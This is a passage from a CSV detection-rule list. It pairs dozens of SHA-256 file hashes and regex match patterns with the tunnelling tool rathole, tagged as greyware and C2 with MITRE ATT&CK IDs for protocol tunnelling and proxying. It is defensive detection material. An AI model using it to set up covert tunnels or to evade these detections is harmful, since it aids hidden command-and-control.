TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*46813eb8d4d50118f67087792670db2b8efdef414c6d3134ad474f1e6856c704*",".{0,1000}46813eb8d4d50118f67087792670db2b8efdef414c6d3134ad474f1e6856c704.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*4684afc644880a2ba1b92c512ed3d4e5c653236d370e069b13065b1af878fe5c*",".{0,1000}4684afc644880a2ba1b92c512ed3d4e5c653236d370e069b13065b1af878fe5c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*469b789cfedcb5d0c3ffd47a4fb4666f38e582b56fb75efb21e38de4b23d8e9b*",".{0,1000}469b789cfedcb5d0c3ffd47a4fb4666f38e582b56fb75efb21e38de4b23d8e9b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*46c6e992b3552d3672c40e7a91ecfb6f9b4620199cf2b5d1dd11cfccd44fa4b0*",".{0,1000}46c6e992b3552d3672c40e7a91ecfb6f9b4620199cf2b5d1dd11cfccd44fa4b0.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*4721c0b58d6421bff09d13ade097f71af24d0752c2a9d69021f53e2726c76b5b*",".{0,1000}4721c0b58d6421bff09d13ade097f71af24d0752c2a9d69021f53e2726c76b5b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*482e5f220835c0ed0bad7c5823a7aab0e3c04fbe020d13f403400ddb368ab705*",".{0,1000}482e5f220835c0ed0bad7c5823a7aab0e3c04fbe020d13f403400ddb368ab705.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*48a3b1707d22b65890d7feae45f45dff52faa7234ea5fb6f8c738eb0ad265246*",".{0,1000}48a3b1707d22b65890d7feae45f45dff52faa7234ea5fb6f8c738eb0ad265246.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*48c45f037e2d32fa7f55d0c1e9957bba8cf9bce467437c389c5630d00dd46e10*",".{0,1000}48c45f037e2d32fa7f55d0c1e9957bba8cf9bce467437c389c5630d00dd46e10.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*4babb86918876772a6370e0e08a2640186971a1124728616289a9bda68ddc434*",".{0,1000}4babb86918876772a6370e0e08a2640186971a1124728616289a9bda68ddc434.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*4be299e6a3466a6306d4ead72959aafa4a6c05618ddabc47d67dd0efd34281d7*",".{0,1000}4be299e6a3466a6306d4ead72959aafa4a6c05618ddabc47d67dd0efd34281d7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*4bf8d88abad30daff8751a1c3a82769901969db2691ba8047cca09641410fca3*",".{0,1000}4bf8d88abad30daff8751a1c3a82769901969db2691ba8047cca09641410fca3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*4fb15611c3facf046b2f52178d939e5c7b9fbba79320bd0329e129c4f179cd3d*",".{0,1000}4fb15611c3facf046b2f52178d939e5c7b9fbba79320bd0329e129c4f179cd3d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5041dad585a35ab841cf44028ee5318b61ce73b97f2ff90757a8ce609e620a63*",".{0,1000}5041dad585a35ab841cf44028ee5318b61ce73b97f2ff90757a8ce609e620a63.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*507fb6f358381291fe987336263b35ab8c49b42abfa44f4b3f159b92ac54c521*",".{0,1000}507fb6f358381291fe987336263b35ab8c49b42abfa44f4b3f159b92ac54c521.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*51fffad6f5e6f4a431c08cc28c25297e62f85f97dca246fecb6f3c5d3ca22cbb*",".{0,1000}51fffad6f5e6f4a431c08cc28c25297e62f85f97dca246fecb6f3c5d3ca22cbb.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5252ae734d3bc191efdb95074830509a7ae4293fa25ce866b9fe35c455e61058*",".{0,1000}5252ae734d3bc191efdb95074830509a7ae4293fa25ce866b9fe35c455e61058.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*53afadaca917c0192ff3c2bae061516c6b14e6befe1d2d5c0cbb5f96de2eb74b*",".{0,1000}53afadaca917c0192ff3c2bae061516c6b14e6befe1d2d5c0cbb5f96de2eb74b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5852511a70f384dcf32e29b3ec2f3d10d2704fdaae504d07d3876a887ca05cf4*",".{0,1000}5852511a70f384dcf32e29b3ec2f3d10d2704fdaae504d07d3876a887ca05cf4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*589f0861ae990113c24fed3527dc6b15d3b9108bfbda358ed10503800820508a*",".{0,1000}589f0861ae990113c24fed3527dc6b15d3b9108bfbda358ed10503800820508a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*58cea3ee018d8f72239d639b012df07d9b0d22e49ecbe2522461db439643fb11*",".{0,1000}58cea3ee018d8f72239d639b012df07d9b0d22e49ecbe2522461db439643fb11.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*58edc63c43a77b5d217b081b9597824ff4831de52ce2491bcff4c62ce6888e2f*",".{0,1000}58edc63c43a77b5d217b081b9597824ff4831de52ce2491bcff4c62ce6888e2f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5a7cd4fcf7cecb7d346af8e28b49ad66c43d5bb34610485dde2210cadba3d8c2*",".{0,1000}5a7cd4fcf7cecb7d346af8e28b49ad66c43d5bb34610485dde2210cadba3d8c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5b3ae3dde66a377dec786323215a45d10f55ada626d29a2890d2f4915111b7a7*",".{0,1000}5b3ae3dde66a377dec786323215a45d10f55ada626d29a2890d2f4915111b7a7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5b65d6f452aacc65b9282a842c5c327bf27bb92c11d73ed5466ba29f582bea07*",".{0,1000}5b65d6f452aacc65b9282a842c5c327bf27bb92c11d73ed5466ba29f582bea07.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5c470be4bbc5ffc24dfbde00aba320a8eb66a4bd2889a02e4e97a5c12117e061*",".{0,1000}5c470be4bbc5ffc24dfbde00aba320a8eb66a4bd2889a02e4e97a5c12117e061.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*5f9832e49d35fa40dd007cdb3cdddfea38ea63079cce124a01b43d7b47d4c6be*",".{0,1000}5f9832e49d35fa40dd007cdb3cdddfea38ea63079cce124a01b43d7b47d4c6be.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6130adcd3415141a87525d6a511d996d1b17afd3f9876e48b36f866c86a9f7c6*",".{0,1000}6130adcd3415141a87525d6a511d996d1b17afd3f9876e48b36f866c86a9f7c6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6133e8d04f789d3810b1c9fe24b0454ee821d809bae82e26642baa6f7a5312b6*",".{0,1000}6133e8d04f789d3810b1c9fe24b0454ee821d809bae82e26642baa6f7a5312b6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*62fe7d29d8b013efa5b599313a50713b285473514819ed4b427d910211c53d24*",".{0,1000}62fe7d29d8b013efa5b599313a50713b285473514819ed4b427d910211c53d24.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*661ff1a84f0413f062b672be7ffccad36357290c76646715887689e3524e2b48*",".{0,1000}661ff1a84f0413f062b672be7ffccad36357290c76646715887689e3524e2b48.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6680fa302838dad7262ebe0dc33c2f954d74552021062e3dc1f20993038e54bc*",".{0,1000}6680fa302838dad7262ebe0dc33c2f954d74552021062e3dc1f20993038e54bc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*669d5f76c3456565a231a907aee6c2887a8835638a023cbded6c7bdaa306fbe5*",".{0,1000}669d5f76c3456565a231a907aee6c2887a8835638a023cbded6c7bdaa306fbe5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*68c3320fc6aac048a90bbbbe7e066df33a9ad43831fe27101130627e1180565d*",".{0,1000}68c3320fc6aac048a90bbbbe7e066df33a9ad43831fe27101130627e1180565d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*68d84e43220ca8a2245f37422e8499710529197cfa599ee2174049c83fd68898*",".{0,1000}68d84e43220ca8a2245f37422e8499710529197cfa599ee2174049c83fd68898.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6988f41ce97bebcfae509ed20ba95dc1a7148dcafdfb7c58452088d6d6d74df4*",".{0,1000}6988f41ce97bebcfae509ed20ba95dc1a7148dcafdfb7c58452088d6d6d74df4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6b994027ecb764471cdcf3d547532203e4fcbe55fd68ad04a5f9881b56fce399*",".{0,1000}6b994027ecb764471cdcf3d547532203e4fcbe55fd68ad04a5f9881b56fce399.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6c511d6c053f8958c718d4374289b25457d4d426c0215c5eba3616f77c6f65bb*",".{0,1000}6c511d6c053f8958c718d4374289b25457d4d426c0215c5eba3616f77c6f65bb.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6c8386af326a7123f12bff56f737a825e52564e9f142862cbd88653fc5b841b7*",".{0,1000}6c8386af326a7123f12bff56f737a825e52564e9f142862cbd88653fc5b841b7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6d01bb9b786da4013f55f0fe29dfb7490cede245414db1bac43fb204aad2c97c*",".{0,1000}6d01bb9b786da4013f55f0fe29dfb7490cede245414db1bac43fb204aad2c97c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6d686399731d32af0783b096717c5a14fdbe74e1e432ee2e8fdaace36ebbbe3d*",".{0,1000}6d686399731d32af0783b096717c5a14fdbe74e1e432ee2e8fdaace36ebbbe3d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6e2966ff6488fa05ed5ffb24ae5dde4fe1954b3006aa0269510ac9feaf099c78*",".{0,1000}6e2966ff6488fa05ed5ffb24ae5dde4fe1954b3006aa0269510ac9feaf099c78.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*6e8b78647d756a84e7662d42955224fe17bcea674ff125ba1e63b0737ceaebe1*",".{0,1000}6e8b78647d756a84e7662d42955224fe17bcea674ff125ba1e63b0737ceaebe1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*701fd0ae9d88d3a08c418e9d0fca6651c058b7eef8fb34194acf753bfd80e221*",".{0,1000}701fd0ae9d88d3a08c418e9d0fca6651c058b7eef8fb34194acf753bfd80e221.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*711795b31d4482d7f7ce181b00db2ce2a33d3d7675f1d9feab0e984b017d2178*",".{0,1000}711795b31d4482d7f7ce181b00db2ce2a33d3d7675f1d9feab0e984b017d2178.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*726996a84c8ef0f3c50ecbab6842c5679c38f73f2dd7d0c7f7b4dec5411daee3*",".{0,1000}726996a84c8ef0f3c50ecbab6842c5679c38f73f2dd7d0c7f7b4dec5411daee3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*735a96908571fa623b9d4065a3061deaa897e5140724fc3dcb620bdd6679b516*",".{0,1000}735a96908571fa623b9d4065a3061deaa897e5140724fc3dcb620bdd6679b516.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*73793e0d320ba7c4a8a4c5b7fe75283ca880530e18c76f3fc02180603301a34b*",".{0,1000}73793e0d320ba7c4a8a4c5b7fe75283ca880530e18c76f3fc02180603301a34b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*768789bf3298d6ebcd03995ad1a0af4de83af5d894030c67e70edc229f61bd75*",".{0,1000}768789bf3298d6ebcd03995ad1a0af4de83af5d894030c67e70edc229f61bd75.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*77bbb9dfeb00b721fdd4e6bf429487460843ca308673fb344c8ccbdb2e7ee7b6*",".{0,1000}77bbb9dfeb00b721fdd4e6bf429487460843ca308673fb344c8ccbdb2e7ee7b6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*7836f34128ee338249e00a47199408d57a052bd5f3e542ee9f09b6e42ad0895f*",".{0,1000}7836f34128ee338249e00a47199408d57a052bd5f3e542ee9f09b6e42ad0895f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*7e479c191b5a4dc29c0da009c7165ed6cba9171338a6360ce9e8e83167dcba99*",".{0,1000}7e479c191b5a4dc29c0da009c7165ed6cba9171338a6360ce9e8e83167dcba99.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*7f476454dbd7fb672b1d63e0786e2e2755a1fbfc3be04ab4f5bec8f23132a631*",".{0,1000}7f476454dbd7fb672b1d63e0786e2e2755a1fbfc3be04ab4f5bec8f23132a631.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*7fd3bda1079e0e7ca9186f8e2ac6a41c688b5ad0293b9afbe1f4397aa8f26e53*",".{0,1000}7fd3bda1079e0e7ca9186f8e2ac6a41c688b5ad0293b9afbe1f4397aa8f26e53.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*7ff5da235f8932a5e66bcf40bdf79947ebe731f8802af62a10684fed4e4e0388*",".{0,1000}7ff5da235f8932a5e66bcf40bdf79947ebe731f8802af62a10684fed4e4e0388.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*822374f306a334c37c055f40f4adcc6ef5b381a0e38133760634bdcd480186aa*",".{0,1000}822374f306a334c37c055f40f4adcc6ef5b381a0e38133760634bdcd480186aa.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*831296851f3b9f90c613b245ea3957e926f44f8373121a29b3f63df905b614c4*",".{0,1000}831296851f3b9f90c613b245ea3957e926f44f8373121a29b3f63df905b614c4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*84002e45f5979c6ca1478be38d0215007f8208edb2b4a45e2571f6c003828dbc*",".{0,1000}84002e45f5979c6ca1478be38d0215007f8208edb2b4a45e2571f6c003828dbc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*846318dda27ff847acc25676c4d7a133ee8ea2cb80d4f5d273ef0945f211dd57*",".{0,1000}846318dda27ff847acc25676c4d7a133ee8ea2cb80d4f5d273ef0945f211dd57.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*84c868b63bcfba344a52d0f53c63beaaf5dfc08f0ead2cee80656b48fa1d5e47*",".{0,1000}84c868b63bcfba344a52d0f53c63beaaf5dfc08f0ead2cee80656b48fa1d5e47.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*85549f76ecf192f4e61cdcbedc8af83b48a76d78924ab9c09eaeb31141944770*",".{0,1000}85549f76ecf192f4e61cdcbedc8af83b48a76d78924ab9c09eaeb31141944770.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
